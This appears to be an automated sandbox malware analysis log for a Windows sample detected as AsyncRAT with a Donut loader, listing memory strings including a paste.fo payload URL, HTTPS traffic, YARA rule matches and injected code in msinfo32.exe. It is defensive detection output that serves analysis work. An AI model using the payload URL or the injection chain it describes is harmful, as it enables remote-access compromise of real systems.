Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499=)
Source: FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499D
Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499G
Source: FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499IUr
Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499XN&b
Source: FRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499e
Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718040937.0000025E70A62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718458434.0000025E70A6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499j~
Source: FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499t(X?

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00294AA1	0_2_00294AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002AB6F0	0_2_002AB6F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E00C	0_2_0029E00C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029D060	0_2_0029D060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002BC860	0_2_002BC860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002CA040	0_2_002CA040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C78A0	0_2_002C78A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C3880	0_2_002C3880
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002CD8D0	0_2_002CD8D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002B5120	0_2_002B5120
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E90D	0_2_0029E90D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002B915F	0_2_002B915F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029C150	0_2_0029C150
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002AE9E0	0_2_002AE9E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C59E0	0_2_002C59E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002921C7	0_2_002921C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C71D0	0_2_002C71D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002BAA2F	0_2_002BAA2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002CB230	0_2_002CB230
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00292AB9	0_2_00292AB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002A4A80	0_2_002A4A80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E2E4	0_2_0029E2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002BA2C0	0_2_002BA2C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002B02C0	0_2_002B02C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00299B20	0_2_00299B20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002AF320	0_2_002AF320
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002B4B20	0_2_002B4B20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002A7330	0_2_002A7330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C5310	0_2_002C5310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002A1B61	0_2_002A1B61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_00293B76	0_2_00293B76
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002A2BFB	0_2_002A2BFB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C2BC0	0_2_002C2BC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002D0410	0_2_002D0410
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002AD4B0	0_2_002AD4B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C2480	0_2_002C2480
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002CF500	0_2_002CF500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E574	0_2_0029E574
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002BDDB0	0_2_002BDDB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C1E10	0_2_002C1E10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002B9E60	0_2_002B9E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C06A0	0_2_002C06A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E6CC	0_2_0029E6CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002C3F60	0_2_002C3F60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_0029E77F	0_2_0029E77F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002A9790	0_2_002A9790
Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: 0_2_002CA790	0_2_002CA790
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA11021578	2_2_000001AA11021578
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA1102119C	2_2_000001AA1102119C
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA110219A8	2_2_000001AA110219A8
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA110202C0	2_2_000001AA110202C0
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA11024C54	2_2_000001AA11024C54
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_000001AA1102245C	2_2_000001AA1102245C
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_00007FFD9B890EFA	2_2_00007FFD9B890EFA
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_00007FFD9B895CE6	2_2_00007FFD9B895CE6
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 2_2_00007FFD9B896A92	2_2_00007FFD9B896A92
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B64AA1	3_2_00B64AA1
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B7B6F0	3_2_00B7B6F0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B978A0	3_2_00B978A0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B93880	3_2_00B93880
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B9D8D0	3_2_00B9D8D0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E00C	3_2_00B6E00C
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6D060	3_2_00B6D060
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B8C860	3_2_00B8C860
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B9A040	3_2_00B9A040
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B7E9E0	3_2_00B7E9E0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B959E0	3_2_00B959E0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B971D0	3_2_00B971D0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B621C7	3_2_00B621C7
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B85120	3_2_00B85120
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E90D	3_2_00B6E90D
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6C150	3_2_00B6C150
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B8915F	3_2_00B8915F
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B62AB9	3_2_00B62AB9
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B74A80	3_2_00B74A80
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E2E4	3_2_00B6E2E4
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B8A2C0	3_2_00B8A2C0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B802C0	3_2_00B802C0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B9B230	3_2_00B9B230
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B8AA2F	3_2_00B8AA2F
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B72BFB	3_2_00B72BFB
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B92BC0	3_2_00B92BC0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B77330	3_2_00B77330
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B69B20	3_2_00B69B20
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B7F320	3_2_00B7F320
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B84B20	3_2_00B84B20
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B95310	3_2_00B95310
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B63B76	3_2_00B63B76
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B71B61	3_2_00B71B61
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B7D4B0	3_2_00B7D4B0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B92480	3_2_00B92480
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00BA0410	3_2_00BA0410
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B8DDB0	3_2_00B8DDB0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B9F500	3_2_00B9F500
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E574	3_2_00B6E574
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B906A0	3_2_00B906A0
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E6CC	3_2_00B6E6CC
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B91E10	3_2_00B91E10
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B89E60	3_2_00B89E60
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B79790	3_2_00B79790
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B9A790	3_2_00B9A790
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B6E77F	3_2_00B6E77F
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: 3_2_00B93F60	3_2_00B93F60
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD67119C	5_2_00000204FD67119C
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD671578	5_2_00000204FD671578
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD6719A8	5_2_00000204FD6719A8
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD6702C0	5_2_00000204FD6702C0
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD674C54	5_2_00000204FD674C54
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 5_2_00000204FD67245C	5_2_00000204FD67245C
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED7119C	11_2_0000027ADED7119C
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED71578	11_2_0000027ADED71578
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED702C0	11_2_0000027ADED702C0
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED719A8	11_2_0000027ADED719A8
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED74C54	11_2_0000027ADED74C54
Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe	Code function: 11_2_0000027ADED7245C	11_2_0000027ADED7245C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe	Code function: String function: 0029A110 appears 67 times
Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe	Code function: String function: 00B6A110 appears 67 times

Source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
